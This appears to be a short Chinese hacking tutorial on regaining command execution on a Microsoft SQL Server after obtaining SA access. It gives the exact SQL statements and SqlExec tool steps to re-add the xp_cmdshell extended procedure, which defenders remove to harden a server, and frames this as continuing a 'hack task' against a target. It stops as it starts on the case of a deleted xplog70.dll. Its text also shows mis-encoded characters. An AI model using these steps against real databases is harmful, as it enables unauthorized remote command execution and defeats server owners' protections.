Microsoft SQL Server數(shù)據(jù)庫SA權(quán)限總結(jié)
SQL Query Analyzer和SqlExec Sunx Version
第一部分:
去掉xp_cmdshell保護(hù)系統(tǒng)的具體分析:
語句如下:
1.去掉xp_cmdshell擴(kuò)展過程的方法是使用如下語句:
if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
2.添加xp_cmdshell擴(kuò)展過程的方法是使用如下語句:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
現(xiàn)在看看現(xiàn)象:
我們在取得SA權(quán)限后遠(yuǎn)程用Sqlexec執(zhí)行cmd命令,出現(xiàn)提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。
現(xiàn)在來看看被去掉xp_cmdshell后恢復(fù)的兩種方法:
方法一、使用SQL Query Analyzer連接對方后直接寫入,挺方便sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
方法二、使用SqlExec Sunx Version首先在SqlExec Sunx Version的Format選項(xiàng)里填上%s,在CMD選項(xiàng)里輸入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'或者對Sql2000情況下使用sp_addextendedproc 'xp_cmdshell','xplog70.dll'另外使用SqlExec Sunx Version來去除xp_cmdshell的方法和加的時(shí)候選擇條件一樣,然后輸入sp_dropextendedproc 'xp_cmdshell'就可以了。
第二部分:
假如對方已經(jīng)把xplog70.dll刪除或者改了名,我們來用下面的方法繼續(xù)我們的hack任務(wù):
當(dāng)出現(xiàn)如下現(xiàn)象暗示代表很有可能是xplog70.dll刪除或者改了名。
在查詢分析器中寫入sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'提示數(shù)據(jù)庫中已存在名為'xp_cmdshell'的對象。
評(píng)論